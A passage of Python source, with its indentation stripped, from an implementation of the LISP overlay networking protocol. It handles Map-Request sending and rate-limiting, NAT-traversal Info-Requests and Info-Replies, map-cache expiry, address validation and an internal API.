dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port 4341 so the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold the request nonce so we can match replies from xTRs that have
# multiple RLOCs. The reason is that the reply's source address may not
# be the probed destination. And on our ETR implementation, we can get
# the probe request destination in the lisp-core/lisp-etr/lisp-rtr
# processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with the same translated address/port pair (the same
# values it uses when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have the lisp-itr and lisp-etr
# processes both adding and deleting host routes (for Info-Request
# sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# Wait for the host route to go away before proceeding. We will use
# the map-server host route as an IPC lock. For the data port, only
# the lisp-etr process will add a host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented-out call would allow
# Info-Requests to use source port 4342 but would break the data-plane
# in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from them
# specially, proxy-Map-Requesting when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers. Note that this function is currently
# disabled by the early return below.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is, check to see if the private address changed, since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (via an Arista platform-specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). Then subsequently walk the
# entries in each entry's lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from the lisp_map_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array of lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
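# A minimal sketch of the state this function maintains (hypothetical
# addresses and ports): after Info-Requests from hostname "xtr-1" arrive
# translated as 1.1.1.1:4000 and later as 2.2.2.2:5000, we have:
#
#   lisp_nat_state_info["xtr-1"] =
#       [lisp_nat_info("2.2.2.2", "xtr-1", 5000),
#        lisp_nat_info("1.1.1.1", "xtr-1", 4000)]
#
# The youngest state is always first; older state is kept to track movement.
#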
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the new state does not match the youngest entry. See if it exists as
# an older entry. If not, we prepend the new state; otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request on, and install an
# ephemeral static route to force the Info-Request out a specific interface.
#
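# As an illustration (hypothetical addresses), if a Map-Server RLOC is
# 8.8.8.8 and eth1's default-route next-hop is 192.168.1.1, the ephemeral
# host route installed via lisp_install_host_route() is equivalent to:
#
#   ip route add 8.8.8.8/32 via 192.168.1.1
#
# and it is removed once the Info-Request has been sent.
#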
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6,
# and MAC addresses, as well as distinguished-names, geo-prefixes, and E.164
# numbers.
#
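# Examples of values this function accepts or rejects (illustrative):
#
#   lisp_valid_address_format("address", "10.0.0.1")        -> True
#   lisp_valid_address_format("address", "aabb:cc::dd")     -> True
#   lisp_valid_address_format("address", "0000-1111-2222")  -> True (MAC)
#   lisp_valid_address_format("address", "'my-dist-name'")  -> True
#   lisp_valid_address_format("address", "+14085551212")    -> True (E.164)
#   lisp_valid_address_format("address", "10.0.0.256")      -> False
#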
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the lisp-core process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
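# For example (hypothetical values), a request for a specific map-cache
# entry arrives as:
#
#   'map-cache%{"instance-id": "0", "eid-prefix": "10.1.0.0/16"}'
#
# and a request for the full table arrives with empty parameters as
# "map-cache%".
#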
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
